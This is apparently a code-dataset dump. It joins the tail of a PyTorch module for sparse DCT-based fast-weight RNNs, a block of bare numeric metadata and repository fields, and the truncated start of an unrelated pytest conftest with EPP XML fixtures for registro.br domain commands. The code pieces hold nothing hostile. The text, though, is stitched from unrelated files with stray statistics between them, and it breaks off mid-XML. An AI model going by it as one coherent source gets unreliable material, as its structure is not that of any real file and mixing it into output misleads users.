init_f = torch.fliplr(dct.dct_2d(init, norm='ortho'))
ind = torch.triu_indices(dim_out, dim_in, diag_shift)
# coeffs_init = init_f[ind.numpy()] * factor
coeffs_init = init_f[tuple(ind)] * factor
return coeffs_init
def to_weights(self, coeffs, ind, zero_weights, linear1, linear2):
zero_weights_ = zero_weights.clone()
weights = torch.fliplr(zero_weights_.index_put_(tuple(ind), coeffs))
# weights = dct.idct_2d(weights)
weights = linear1(weights)
weights = linear2(weights.transpose(-1, -2))
return weights.transpose(-1, -2)
def get_sparse_config(self, in_dim, out_dim, sparsity_level):
'''Get num_diagonals and num coeffs.
Given the dimension of matrix
in_dim: number of columns
out_dim: number of rows
We want to find the right diagonal shift "d" s.t.
N(d) < thr(desired sparsity) < N(d+1)
N(d+1)
We search as follows:
- If: N(0) is below thr: try N(n) for n = -1..-out_dim
- Else: try N(n) for n = 1..in_dim
input: 2 dimensions of the weight matrix
output: tuple (num_diagonal, num_coeff)
'''
total_el = in_dim * out_dim
thr = int(total_el * (1 - sparsity_level)) # just truncate fraction.
for num_diag in range(in_dim): # upper triagular matrix.
non_zeros = torch.triu_indices(out_dim, in_dim, num_diag).size()[1]
if non_zeros < thr:
break
if num_diag == 0: # also check the other direction
for neg_diag in range(-1, -out_dim, -1):
new_non_zeros = torch.triu_indices(
out_dim, in_dim, neg_diag).size()[1]
if new_non_zeros > thr:
# means that the previous one was the good one.
break
else:
non_zeros = new_non_zeros
num_diag = neg_diag
print(f"sparsity: {(total_el - non_zeros) / total_el * 100 :.1f} %"
f" vs. desired sparsity {sparsity_level * 100} %")
return non_zeros, num_diag
def get_weights(self, device):
# Generate the full weights.
# return: weights of shape (hidden_dim * 4 , input_dim * hidden_dim)
# input to hidden
w_ih = None
coeffs = self.coeffs_ih
if self.dropout_dct:
coeffs = self.wdrop(coeffs)
weights = self.to_weights(
coeffs, self.ih_ind, self.ih_weights_f,
self.in_dct_layer, self.hid_dct_layer)
if w_ih is not None:
w_ih = torch.cat([w_ih, weights], dim=0)
else:
w_ih = weights
# hidden to hidden
w_hh = None
coeffs = self.coeffs_hh
if self.dropout_dct:
coeffs = self.wdrop(coeffs)
weights = self.to_weights(
coeffs, self.hh_ind, self.hh_weights_f,
self.hid_dct_layer, self.hid_dct_layer)
if w_hh is not None:
w_hh = torch.cat([w_hh, weights], dim=0)
else:
w_hh = weights
# concatenate both
# weights = torch.cat([w_ih, w_hh], dim=1)
return (w_ih, w_hh)
def forward(self, input_, hidden=None, device='cuda'):
# input shape: (len, B, dim)
# output shape: (len * B, num_classes)
outputs = []
if hidden is None:
hidden_fast_weight_ih = (
torch.zeros(1, input_.shape[1], self.in_coeffs_dim,
device=input_.device),
torch.zeros(1, input_.shape[1], self.in_coeffs_dim,
device=input_.device))
hidden_fast_weight_hh = (
torch.zeros(1, input_.shape[1], self.hidden_coeffs_dim,
device=input_.device),
torch.zeros(1, input_.shape[1], self.hidden_coeffs_dim,
device=input_.device))
hidden = torch.zeros(
1, input_.shape[1], self.hidden_dim, device=input_.device)
else:
h, hidden_fast_weight_ih, hidden_fast_weight_hh = hidden
hidden = h
# compute fast weight first.
fast_output_ih, hidden_fast_weight_ih = self.fast_weights_lstm_ih(
input_, hidden_fast_weight_ih)
fast_output_hh, hidden_fast_weight_hh = self.fast_weights_lstm_hh(
input_, hidden_fast_weight_hh)
fast_output_ih = torch.unbind(fast_output_ih, dim=0)
fast_output_hh = torch.unbind(fast_output_hh, dim=0)
for i, x in enumerate(torch.unbind(input_, dim=0)):
weights_ih = fast_output_ih[i]
weights_hh = fast_output_hh[i]
if self.weight_drop > 0.0:
weights_ih = self.wdrop(weights_ih)
weights_hh = self.wdrop(weights_hh)
h = self.forward_step(x, hidden, weights_ih, weights_hh)
outputs.append(h.clone())
hidden = h
op = torch.squeeze(torch.stack(outputs))
hidden = (h, hidden_fast_weight_ih, hidden_fast_weight_hh)
return op, hidden
def forward_step(self, x, prev_state, ih_weight=None, hh_weight=None):
assert ih_weight is not None
assert hh_weight is not None
# One time step forwarding.
# input x: (B, in_dim)
# prev_state: tuple 2 * (B, out_dim)
h = torch.squeeze(prev_state)
bsz = x.shape[0]
if bsz != self.batch_size: # take sub-tensors
total_dim_coeffs = int(
bsz * self.ih_ind.shape[-1] / self.batch_size)
ih_ind = self.ih_ind[:, : total_dim_coeffs]
total_dim_coeffs = int(
bsz * self.hh_ind.shape[-1] / self.batch_size)
hh_ind = self.hh_ind[:, : total_dim_coeffs]
else:
ih_ind = self.ih_ind
hh_ind = self.hh_ind
if self.coef_scale:
ih_weight = ih_weight * self.coef_scaler_ih.unsqueeze(0)
hh_weight = hh_weight * self.coef_scaler_hh.unsqueeze(0)
out = self.linear_with_dct(
x, ih_weight,
self.in_idct_layer.weight, self.hid_idct_layer.weight,
self.in_dct_layer.weight, self.hid_dct_layer.weight,
ih_ind, self.ih_weights_f, None)
out = out + self.linear_with_dct(
h, hh_weight, self.hid_idct_layer.weight,
self.hid_idct_layer.weight, self.hid_dct_layer.weight,
self.hid_dct_layer.weight,
hh_ind, self.hh_weights_f, self.bias)
out = torch.tanh(out)
return out
if __name__ == '__main__':
# Simple forwarding
batch_size = 3
seq_len = 5
input_dim = 10
hidden_dim = 20
sparsity_ih = 0.8
sparsity_hh = 0.8
print('FastDctRNN')
dct_fast_rnn = FastDctRNN(
input_dim, hidden_dim, sparsity_ih, sparsity_hh, batch_size=batch_size)
dct_fast_rnn = dct_fast_rnn.to('cuda')
input = torch.randn(seq_len, batch_size, input_dim, device='cuda')
output, all_states = dct_fast_rnn(input)
print(output.shape)
print('SeparateFastDctRNN')
dct_fast_rnn_twin = SeparateFastDctRNN(
input_dim, hidden_dim, sparsity_ih, sparsity_hh, batch_size=batch_size)
dct_fast_rnn_twin = dct_fast_rnn_twin.to('cuda')
output, all_states = dct_fast_rnn_twin(input)
print(output.shape)
| 35.946254
| 79
| 0.596393
| 2,989
| 22,071
| 4.127133
| 0.07996
| 0.029912
| 0.016861
| 0.017023
| 0.877351
| 0.871595
| 0.86049
| 0.845006
| 0.822147
| 0.811608
| 0
| 0.009621
| 0.307734
| 22,071
| 613
| 80
| 36.004894
| 0.797762
| 0.134339
| 0
| 0.798526
| 0
| 0
| 0.029268
| 0
| 0
| 0
| 0
| 0.003263
| 0.007371
| 1
| 0.034398
| false
| 0
| 0.014742
| 0
| 0.083538
| 0.027027
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
66659baa05e180bc8eef4e216c5b218171dbbf6f
| 34,244
|
py
|
Python
|
tests/unit/domain/conftest.py
|
ivcmartello/registrobrepp
|
dece39a451bcdb964d337df6aa7bd418a60c1a85
|
[
"MIT"
] | null | null | null |
tests/unit/domain/conftest.py
|
ivcmartello/registrobrepp
|
dece39a451bcdb964d337df6aa7bd418a60c1a85
|
[
"MIT"
] | null | null | null |
tests/unit/domain/conftest.py
|
ivcmartello/registrobrepp
|
dece39a451bcdb964d337df6aa7bd418a60c1a85
|
[
"MIT"
] | null | null | null |
import pytest
from decouple import config
@pytest.fixture
def domainxmlschema():
from lxml import etree
schema = config('EPPSCHEMAPATH', '../../../schemas') + '/domain-1.0.xsd'
xmlschema_doc = etree.parse(schema)
return etree.XMLSchema(xmlschema_doc)
@pytest.fixture
def checkdomaincommandxmlexpected():
return """<epp xmlns="urn:ietf:params:xml:ns:epp-1.0">
<command>
<check>
<domain:check xmlns:domain="urn:ietf:params:xml:ns:domain-1.0">
<domain:name>du.eti.br</domain:name>
<domain:name>nic.br</domain:name>
<domain:name>registro.br</domain:name>
</domain:check>
</check>
<clTRID>ABC-12345</clTRID>
</command>
</epp>
"""
@pytest.fixture
def checkdomaincommandwithlaunchxmlexpected():
return """<epp xmlns="urn:ietf:params:xml:ns:epp-1.0">
<command>
<check>
<domain:check xmlns:domain="urn:ietf:params:xml:ns:domain-1.0">
<domain:name>du.eti.br</domain:name>
<domain:name>nic.br</domain:name>
<domain:name>registro.br</domain:name>
</domain:check>
</check>
<extension>
<launch:check type="claims" xmlns:launch="urn:ietf:params:xml:ns:launch-1.0">
<launch:phase>claims</launch:phase>
</launch:check>
</extension>
<clTRID>ABC-12345</clTRID>
</command>
</epp>
"""
@pytest.fixture
def checkdomaincommandwithbrdomainxmlexpected():
return """<epp xmlns="urn:ietf:params:xml:ns:epp-1.0">
<command>
<check>
<domain:check xmlns:domain="urn:ietf:params:xml:ns:domain-1.0">
<domain:name>du.eti.br</domain:name>
<domain:name>nic.br</domain:name>
<domain:name>registro.br</domain:name>
</domain:check>
</check>
<extension>
<brdomain:check xmlns:brdomain="urn:ietf:params:xml:ns:brdomain-1.0">
<brdomain:organization>005.506.560/0001-36</brdomain:organization>
</brdomain:check>
</extension>
<clTRID>ABC-12345</clTRID>
</command>
</epp>
"""
@pytest.fixture
def responsecheckdomaincommandxmlexpected():
return """<epp xmlns="urn:ietf:params:xml:ns:epp-1.0">
<response>
<result code="1000">
<msg>Command completed successfully</msg>
</result>
<resData>
<domain:chkData xmlns:domain="urn:ietf:params:xml:ns:domain-1.0">
<domain:cd>
<domain:name avail="1">example.com</domain:name>
</domain:cd>
<domain:cd>
<domain:name avail="0">example.net</domain:name>
<domain:reason>In use</domain:reason>
</domain:cd>
<domain:cd>
<domain:name avail="1">example.org</domain:name>
</domain:cd>
</domain:chkData>
</resData>
<trID>
<clTRID>ABC-12345</clTRID>
<svTRID>54322-XYZ</svTRID>
</trID>
</response>
</epp>
"""
@pytest.fixture
def responsecheckdomaincommandwithbrdomainxmlexpected():
return """<epp xmlns='urn:ietf:params:xml:ns:epp-1.0'>
<response>
<result code='1000'>
<msg>Command completed successfully</msg>
</result>
<resData>
<domain:chkData xmlns:domain='urn:ietf:params:xml:ns:domain-1.0'>
<domain:cd>
<domain:name avail='0'>e-xample.net.br</domain:name>
<domain:reason>In use</domain:reason>
</domain:cd>
<domain:cd>
<domain:name avail='1'>example.com.br</domain:name>
</domain:cd>
<domain:cd>
<domain:name avail='1'>example.ind.br</domain:name>
</domain:cd>
<domain:cd>
<domain:name avail='0'>example.org.br</domain:name>
</domain:cd>
</domain:chkData>
</resData>
<extension>
<brdomain:chkData xmlns:brdomain='urn:ietf:params:xml:ns:brdomain-1.0'>
<brdomain:cd>
<brdomain:name>e-xample.net.br</brdomain:name>
<brdomain:equivalentName>example.net.br</brdomain:equivalentName>
<brdomain:organization>043.828.151/0001-45</brdomain:organization>
</brdomain:cd>
<brdomain:cd hasConcurrent='1'>
<brdomain:name>example.com.br</brdomain:name>
<brdomain:ticketNumber>123456</brdomain:ticketNumber>
</brdomain:cd>
<brdomain:cd inReleaseProcess='1'>
<brdomain:name>example.ind.br</brdomain:name>
</brdomain:cd>
<brdomain:cd>
<brdomain:name>example.org.br</brdomain:name>
<brdomain:organization>043.828.151/0001-45</brdomain:organization>
</brdomain:cd>
</brdomain:chkData>
</extension>
<trID>
<clTRID>ABC-12345</clTRID>
<svTRID>54322-XYZ</svTRID>
</trID>
</response>
</epp>
"""
@pytest.fixture
def createdomaincommandxmlexpected():
return """<epp xmlns="urn:ietf:params:xml:ns:epp-1.0">
<command>
<create>
<domain:create xmlns:domain="urn:ietf:params:xml:ns:domain-1.0">
<domain:name>example.com</domain:name>
<domain:period unit="y">2</domain:period>
<domain:ns>
<domain:hostObj>ns1.example.net</domain:hostObj>
<domain:hostObj>ns2.example.net</domain:hostObj>
</domain:ns>
<domain:registrant>jd1234</domain:registrant>
<domain:contact type="admin">sh8013</domain:contact>
<domain:contact type="tech">sh8013</domain:contact>
<domain:contact type="billing">xxx</domain:contact>
<domain:authInfo>
<domain:pw>2fooBAR</domain:pw>
</domain:authInfo>
</domain:create>
</create>
<clTRID>ABC-12345</clTRID>
</command>
</epp>
"""
@pytest.fixture
def createdomaincommandwithnshostattxmlexpected():
return """<epp xmlns="urn:ietf:params:xml:ns:epp-1.0">
<command>
<create>
<domain:create xmlns:domain="urn:ietf:params:xml:ns:domain-1.0">
<domain:name>example.com</domain:name>
<domain:period unit="y">2</domain:period>
<domain:ns>
<domain:hostAttr>
<domain:hostName>ns1.example.com</domain:hostName>
<domain:hostAddr ip="v4">192.168.0.0</domain:hostAddr>
</domain:hostAttr>
</domain:ns>
<domain:registrant>jd1234</domain:registrant>
<domain:contact type="admin">sh8013</domain:contact>
<domain:contact type="tech">sh8013</domain:contact>
<domain:contact type="billing">xxx</domain:contact>
<domain:authInfo>
<domain:pw>2fooBAR</domain:pw>
</domain:authInfo>
</domain:create>
</create>
<clTRID>ABC-12345</clTRID>
</command>
</epp>
"""
@pytest.fixture
def createdomaincommandwithsecdnsxmlexpected():
return """<epp xmlns="urn:ietf:params:xml:ns:epp-1.0">
<command>
<create>
<domain:create xmlns:domain="urn:ietf:params:xml:ns:domain-1.0">
<domain:name>example.com</domain:name>
<domain:period unit="y">2</domain:period>
<domain:ns>
<domain:hostObj>ns1.example.net</domain:hostObj>
<domain:hostObj>ns2.example.net</domain:hostObj>
</domain:ns>
<domain:registrant>jd1234</domain:registrant>
<domain:contact type="admin">sh8013</domain:contact>
<domain:contact type="tech">sh8013</domain:contact>
<domain:contact type="billing">xxx</domain:contact>
<domain:authInfo>
<domain:pw>2fooBAR</domain:pw>
</domain:authInfo>
</domain:create>
</create>
<extension>
<secDNS:create xmlns:secDNS="urn:ietf:params:xml:ns:secDNS-1.1">
<secDNS:dsData>
<secDNS:keyTag>12345</secDNS:keyTag>
<secDNS:alg>3</secDNS:alg>
<secDNS:digestType>1</secDNS:digestType>
<secDNS:digest>49FD46E6C4B45C55D4AC</secDNS:digest>
</secDNS:dsData>
</secDNS:create>
</extension>
<clTRID>ABC-12345</clTRID>
</command>
</epp>
"""
@pytest.fixture
def createdomaincommandwithlaunchxmlexpected():
return """<epp xmlns="urn:ietf:params:xml:ns:epp-1.0">
<command>
<create>
<domain:create xmlns:domain="urn:ietf:params:xml:ns:domain-1.0">
<domain:name>example.com</domain:name>
<domain:period unit="y">2</domain:period>
<domain:ns>
<domain:hostObj>ns1.example.net</domain:hostObj>
<domain:hostObj>ns2.example.net</domain:hostObj>
</domain:ns>
<domain:registrant>jd1234</domain:registrant>
<domain:contact type="admin">sh8013</domain:contact>
<domain:contact type="tech">sh8013</domain:contact>
<domain:contact type="billing">xxx</domain:contact>
<domain:authInfo>
<domain:pw>2fooBAR</domain:pw>
</domain:authInfo>
</domain:create>
</create>
<extension>
<launch:create xmlns:launch="urn:ietf:params:xml:ns:launch-1.0">
<launch:phase>sunrise</launch:phase>
<smd:encodedSignedMark xmlns:smd="urn:ietf:params:xml:ns:signedMark-1.0">YkM1cFkyRnViaTV2Y21jdmRHMWphRjl3YVd4dmRDNWpjbXd3UlFZRFZSMGdCRDR3UERBNkJnTXFBd1F3TXpBeEJnZ3JCZ0VGQlFjQwpBUllsYUhSMGNEb3ZMM2QzZHk1cFkyRnViaTV2Y21jdmNHbHNiM1JmY21Wd2IzTnBkRzl5ZVRBTkJna3Foa2lHOXcwQkFRc0ZBQU9DCkFRRUFLVWZFSjVYNlFBdHRhampSVnNlSkZReFJYR0hUZ0NhRGs4Qy8xbmoxaWVsWkF1WnRnZFVwV0RVcjBObkdDaStMSFNzZ2RUWVIKK3ZNcnhpcjdFVllRZXZyQm9iRUxreGVURWZqRjlGVnFqQkhJbnlQRkxPRmt6MTV6R0cySXdQSnBzK3ZoQWQvN2dUMHBoMWsyRkVrSgpGR0w1THdSZjFtczRJWDB2RGt4VElYOFF4eTFqY3pDaVNzb1Y4cHdsaGgyTkhBa3BHUVdOL3BUUzBVcWk3dVU1Qm0vSW9HdlBCelVwCjVuNVNqVU1uVFp4LysxekF1ZXJTYWJ0NDgzc1hCY1dzamdsN01xRnRmT05pQXROZU1OZmg2MGxUTXU0emdWd0xaVE80VFFNNVEydXkKbFBQbVp0d25BODhRdk0ySUw4NWNJWUpIZDB6OWpwVVFNQkdIWEYyV1FBPT08L2RzOlg1MDlDZXJ0aWZpY2F0ZT48L2RzOlg1MDlEYXRhPjwvZHM6S2V5SW5mbz48L2RzOlNpZ25hdHVyZT48L3NtZDpzaWduZWRNYXJrPg==</smd:encodedSignedMark>
</launch:create>
</extension>
<clTRID>ABC-12345</clTRID>
</command>
</epp>
"""
@pytest.fixture
def createdomaincommandwithbrdomainxmlexpected():
return """<epp xmlns="urn:ietf:params:xml:ns:epp-1.0">
<command>
<create>
<domain:create xmlns:domain="urn:ietf:params:xml:ns:domain-1.0">
<domain:name>example.com</domain:name>
<domain:period unit="y">2</domain:period>
<domain:ns>
<domain:hostObj>ns1.example.net</domain:hostObj>
<domain:hostObj>ns2.example.net</domain:hostObj>
</domain:ns>
<domain:registrant>jd1234</domain:registrant>
<domain:contact type="admin">sh8013</domain:contact>
<domain:contact type="tech">sh8013</domain:contact>
<domain:contact type="billing">xxx</domain:contact>
<domain:authInfo>
<domain:pw>2fooBAR</domain:pw>
</domain:authInfo>
</domain:create>
</create>
<extension>
<brdomain:create xmlns:brdomain="urn:ietf:params:xml:ns:brdomain-1.0">
<brdomain:organization>005.506.560/0001-36</brdomain:organization>
<brdomain:releaseProcessFlags flag1="1" />
<brdomain:autoRenew active="1" />
</brdomain:create>
</extension>
<clTRID>ABC-12345</clTRID>
</command>
</epp>
"""
@pytest.fixture
def responsecreatedomaincommandxmlexpected():
return """<epp xmlns="urn:ietf:params:xml:ns:epp-1.0">
<response>
<result code="1000">
<msg>Command completed successfully</msg>
</result>
<resData>
<domain:creData xmlns:domain="urn:ietf:params:xml:ns:domain-1.0">
<domain:name>example.com</domain:name>
<domain:crDate>1999-04-03T22:00:00.0Z</domain:crDate>
<domain:exDate>2001-04-03T22:00:00.0Z</domain:exDate>
</domain:creData>
</resData>
<trID>
<clTRID>ABC-12345</clTRID>
<svTRID>54321-XYZ</svTRID>
</trID>
</response>
</epp>
"""
@pytest.fixture
def responsecreatedomaincommandwithbrdomaixmlexpected():
return """<epp xmlns='urn:ietf:params:xml:ns:epp-1.0'>
<response>
<result code='1001'>
<msg>Command completed successfully; action pending</msg>
</result>
<resData>
<domain:creData xmlns:domain='urn:ietf:params:xml:ns:domain-1.0'>
<domain:name>example.com.br</domain:name>
<domain:crDate>2006-01-30T22:00:00.0Z</domain:crDate>
</domain:creData>
</resData>
<extension>
<brdomain:creData xmlns:brdomain='urn:ietf:params:xml:ns:brdomain-1.0'>
<brdomain:ticketNumber>123456</brdomain:ticketNumber>
<brdomain:pending>
<brdomain:doc status='notReceived'>
<brdomain:docType>CNPJ</brdomain:docType>
<brdomain:limit>2006-03-01T22:00:00.0Z</brdomain:limit>
<brdomain:description lang='pt'>Cadastro Nacional da Pessoa Juridica</brdomain:description>
</brdomain:doc>
<brdomain:dns status='queryTimeOut'>
<brdomain:hostName>ns1.example.com.br</brdomain:hostName>
<brdomain:limit>2006-02-13T22:00:00.0Z</brdomain:limit>
</brdomain:dns>
</brdomain:pending>
<brdomain:ticketNumberConc>123451</brdomain:ticketNumberConc>
<brdomain:ticketNumberConc>123455</brdomain:ticketNumberConc>
</brdomain:creData>
</extension>
<trID>
<clTRID>ABC-12345</clTRID>
<svTRID>54321-XYZ</svTRID>
</trID>
</response>
</epp>
"""
@pytest.fixture
def deletedomaincommandxmlexpected():
return """<epp xmlns="urn:ietf:params:xml:ns:epp-1.0">
<command>
<delete>
<domain:delete xmlns:domain="urn:ietf:params:xml:ns:domain-1.0">
<domain:name>example.com</domain:name>
</domain:delete>
</delete>
<clTRID>ABC-12345</clTRID>
</command>
</epp>
"""
@pytest.fixture
def deletedomaincommandwithlaunchxmlexpected():
return """<epp xmlns="urn:ietf:params:xml:ns:epp-1.0">
<command>
<delete>
<domain:delete xmlns:domain="urn:ietf:params:xml:ns:domain-1.0">
<domain:name>example.com</domain:name>
</domain:delete>
</delete>
<extension>
<launch:delete xmlns:launch="urn:ietf:params:xml:ns:launch-1.0">
<launch:phase>sunrise</launch:phase>
<launch:applicationID>abc123</launch:applicationID>
</launch:delete>
</extension>
<clTRID>ABC-12345</clTRID>
</command>
</epp>
"""
@pytest.fixture
def responsedeletedomaincommandxmlexpected():
return """<epp xmlns="urn:ietf:params:xml:ns:epp-1.0">
<response>
<result code="1000">
<msg>Command completed successfully</msg>
</result>
<trID>
<clTRID>ABC-12345</clTRID>
<svTRID>54321-XYZ</svTRID>
</trID>
</response>
</epp>
"""
@pytest.fixture
def renewdomaincommandxmlexpected():
return """<epp xmlns="urn:ietf:params:xml:ns:epp-1.0">
<command>
<renew>
<domain:renew xmlns:domain="urn:ietf:params:xml:ns:domain-1.0">
<domain:name>example.com.br</domain:name>
<domain:curExpDate>2000-04-03</domain:curExpDate>
<domain:period unit="y">5</domain:period>
</domain:renew>
</renew>
<clTRID>ABC-12345</clTRID>
</command>
</epp>
"""
@pytest.fixture
def responserenewdomaincommandxmlexpected():
return """<epp xmlns="urn:ietf:params:xml:ns:epp-1.0">
<response>
<result code="1000">
<msg>Command completed successfully</msg>
</result>
<resData>
<domain:renData xmlns:domain="urn:ietf:params:xml:ns:domain-1.0">
<domain:name>example.com</domain:name>
<domain:exDate>2005-04-03T22:00:00.0Z</domain:exDate>
</domain:renData>
</resData>
<trID>
<clTRID>ABC-12345</clTRID>
<svTRID>54322-XYZ</svTRID>
</trID>
</response>
</epp>
"""
@pytest.fixture
def responserenewdomaincommandwithbrdomaixmlexpected():
return """<epp xmlns="urn:ietf:params:xml:ns:epp-1.0">
<response>
<result code="1000">
<msg>Command completed successfully</msg>
</result>
<resData>
<domain:renData xmlns:domain="urn:ietf:params:xml:ns:domain-1.0">
<domain:name>example.com.br</domain:name>
<domain:exDate>2007-04-03T00:00:00.0Z</domain:exDate>
</domain:renData>
</resData>
<extension>
<brdomain:renData xmlns:brdomain="urn:ietf:params:xml:ns:brdomain-1.0">
<brdomain:publicationStatus publicationFlag="onHold">
<brdomain:onHoldReason>billing</brdomain:onHoldReason>
<brdomain:onHoldReason>dns</brdomain:onHoldReason>
</brdomain:publicationStatus>
</brdomain:renData>
</extension>
<trID>
<clTRID>ABC-12345</clTRID>
<svTRID>54322-XYZ</svTRID>
</trID>
</response>
</epp>
"""
@pytest.fixture
def infodomaincommandxmlexpected():
return """<epp xmlns="urn:ietf:params:xml:ns:epp-1.0">
<command>
<info>
<domain:info xmlns:domain="urn:ietf:params:xml:ns:domain-1.0">
<domain:name hosts="all">example.com</domain:name>
<domain:authInfo>
<domain:pw>2fooBAR</domain:pw>
</domain:authInfo>
</domain:info>
</info>
<clTRID>ABC-12345</clTRID>
</command>
</epp>
"""
@pytest.fixture
def infodomaincommandwithlaunchxmlexpected():
return """<epp xmlns="urn:ietf:params:xml:ns:epp-1.0">
<command>
<info>
<domain:info xmlns:domain="urn:ietf:params:xml:ns:domain-1.0">
<domain:name hosts="all">example.com</domain:name>
<domain:authInfo>
<domain:pw>2fooBAR</domain:pw>
</domain:authInfo>
</domain:info>
</info>
<extension>
<launch:info includeMark="true" xmlns:launch="urn:ietf:params:xml:ns:launch-1.0">
<launch:phase>claims</launch:phase>
<launch:applicationID>abc123</launch:applicationID>
</launch:info>
</extension>
<clTRID>ABC-12345</clTRID>
</command>
</epp>
"""
@pytest.fixture
def infodomaincommandwithbrdomainxmlexpected():
return """<epp xmlns="urn:ietf:params:xml:ns:epp-1.0">
<command>
<info>
<domain:info xmlns:domain="urn:ietf:params:xml:ns:domain-1.0">
<domain:name hosts="all">example.com</domain:name>
<domain:authInfo>
<domain:pw>2fooBAR</domain:pw>
</domain:authInfo>
</domain:info>
</info>
<extension>
<brdomain:info xmlns:brdomain="urn:ietf:params:xml:ns:brdomain-1.0">
<brdomain:ticketNumber>123456</brdomain:ticketNumber>
</brdomain:info>
</extension>
<clTRID>ABC-12345</clTRID>
</command>
</epp>
"""
@pytest.fixture
def responseinfodomaincommandxmlexpected():
return """<epp xmlns="urn:ietf:params:xml:ns:epp-1.0">
<response>
<result code="1000">
<msg>Command completed successfully</msg>
</result>
<resData>
<domain:infData xmlns:domain="urn:ietf:params:xml:ns:domain-1.0">
<domain:name>example.com</domain:name>
<domain:roid>EXAMPLE1-REP</domain:roid>
<domain:status s="ok" />
<domain:registrant>jd1234</domain:registrant>
<domain:contact type="admin">sh8013</domain:contact>
<domain:contact type="tech">sh8013</domain:contact>
<domain:ns>
<domain:hostObj>ns1.example.com</domain:hostObj>
<domain:hostObj>ns1.example.net</domain:hostObj>
</domain:ns>
<domain:host>ns1.example.com</domain:host>
<domain:host>ns2.example.com</domain:host>
<domain:clID>ClientX</domain:clID>
<domain:crID>ClientY</domain:crID>
<domain:crDate>1999-04-03T22:00:00.0Z</domain:crDate>
<domain:upID>ClientX</domain:upID>
<domain:upDate>1999-12-03T09:00:00.0Z</domain:upDate>
<domain:exDate>2005-04-03T22:00:00.0Z</domain:exDate>
<domain:trDate>2000-04-08T09:00:00.0Z</domain:trDate>
<domain:authInfo>
<domain:pw>2fooBAR</domain:pw>
</domain:authInfo>
</domain:infData>
</resData>
<trID>
<clTRID>ABC-12345</clTRID>
<svTRID>54322-XYZ</svTRID>
</trID>
</response>
</epp>
"""
@pytest.fixture
def responseinfodomaincommandxmlunauthorizedclient():
return """<epp xmlns="urn:ietf:params:xml:ns:epp-1.0">
<response>
<result code="1000">
<msg>Command completed successfully</msg>
</result>
<resData>
<domain:infData xmlns:domain="urn:ietf:params:xml:ns:domain-1.0">
<domain:name>example.com</domain:name>
<domain:roid>EXAMPLE1-REP</domain:roid>
<domain:clID>ClientX</domain:clID>
</domain:infData>
</resData>
<trID>
<clTRID>ABC-12345</clTRID>
<svTRID>54322-XYZ</svTRID>
</trID>
</response>
</epp>
"""
@pytest.fixture
def responseinfodomaincommandwithbrdomainxmlexpected():
return """<epp xmlns='urn:ietf:params:xml:ns:epp-1.0'>
<response>
<result code='1000'>
<msg>Command completed successfully</msg>
</result>
<resData>
<domain:infData xmlns:domain='urn:ietf:params:xml:ns:domain-1.0'>
<domain:name>example.com.br</domain:name>
<domain:roid>EXAMPLE1-REP</domain:roid>
<domain:status s='pendingCreate'/>
<domain:contact type='admin'>fan</domain:contact>
<domain:contact type='billing'>fan</domain:contact>
<domain:contact type='tech'>fan</domain:contact>
<domain:ns>
<domain:hostAttr>
<domain:hostName>ns1.example.com.br</domain:hostName>
<domain:hostAddr ip='v4'>192.0.2.1</domain:hostAddr>
</domain:hostAttr>
<domain:hostAttr>
<domain:hostName>ns1.example.net.br</domain:hostName>
</domain:hostAttr>
</domain:ns>
<domain:clID>ClientX</domain:clID>
<domain:crID>ClientX</domain:crID>
<domain:crDate>2006-01-30T22:00:00.0Z</domain:crDate>
<domain:upID>ClientX</domain:upID>
<domain:upDate>2006-01-31T09:00:00.0Z</domain:upDate>
</domain:infData>
</resData>
<extension>
<brdomain:infData xmlns:brdomain='urn:ietf:params:xml:ns:brdomain-1.0'>
<brdomain:organization>005.506.560/0001-36</brdomain:organization>"
<brdomain:publicationStatus publicationFlag="onHold">
<brdomain:onHoldReason>billing</brdomain:onHoldReason>
<brdomain:onHoldReason>dns</brdomain:onHoldReason>
</brdomain:publicationStatus>
<brdomain:autoRenew active="1"/>
</brdomain:infData>
</extension>
<trID>
<clTRID>ABC-12345</clTRID>
<svTRID>54322-XYZ</svTRID>
</trID>
</response>
</epp>
"""
@pytest.fixture
def transferquerydomaincommandxmlexpected():
return """<epp xmlns="urn:ietf:params:xml:ns:epp-1.0">
<command>
<transfer op="query">
<domain:transfer xmlns:domain="urn:ietf:params:xml:ns:domain-1.0">
<domain:name>example.com</domain:name>
<domain:authInfo>
<domain:pw roid="JD1234-REP">2fooBAR</domain:pw>
</domain:authInfo>
</domain:transfer>
</transfer>
<clTRID>ABC-12345</clTRID>
</command>
</epp>
"""
@pytest.fixture
def transferrequestdomaincommandxmlexpected():
return """<epp xmlns="urn:ietf:params:xml:ns:epp-1.0">
<command>
<transfer op="request">
<domain:transfer xmlns:domain="urn:ietf:params:xml:ns:domain-1.0">
<domain:name>example.com</domain:name>
<domain:period unit="y">1</domain:period>
<domain:authInfo>
<domain:pw roid="JD1234-REP">2fooBAR</domain:pw>
</domain:authInfo>
</domain:transfer>
</transfer>
<clTRID>ABC-12345</clTRID>
</command>
</epp>
"""
@pytest.fixture
def responsetransferquerydomaincommandxmlexpected():
return """<epp xmlns="urn:ietf:params:xml:ns:epp-1.0">
<response>
<result code="1000">
<msg>Command completed successfully</msg>
</result>
<resData>
<domain:trnData xmlns:domain="urn:ietf:params:xml:ns:domain-1.0">
<domain:name>example.com</domain:name>
<domain:trStatus>pending</domain:trStatus>
<domain:reID>ClientX</domain:reID>
<domain:reDate>2000-06-06T22:00:00.0Z</domain:reDate>
<domain:acID>ClientY</domain:acID>
<domain:acDate>2000-06-11T22:00:00.0Z</domain:acDate>
<domain:exDate>2002-09-08T22:00:00.0Z</domain:exDate>
</domain:trnData>
</resData>
<trID>
<clTRID>ABC-12345</clTRID>
<svTRID>54322-XYZ</svTRID>
</trID>
</response>
</epp>
"""
@pytest.fixture
def responsetransferrequestdomaincommandxmlexpected():
return """<epp xmlns="urn:ietf:params:xml:ns:epp-1.0">
<response>
<result code="1001">
<msg>Command completed successfully; action pending</msg>
</result>
<resData>
<domain:trnData xmlns:domain="urn:ietf:params:xml:ns:domain-1.0">
<domain:name>example.com</domain:name>
<domain:trStatus>pending</domain:trStatus>
<domain:reID>ClientX</domain:reID>
<domain:reDate>2000-06-08T22:00:00.0Z</domain:reDate>
<domain:acID>ClientY</domain:acID>
<domain:acDate>2000-06-13T22:00:00.0Z</domain:acDate>
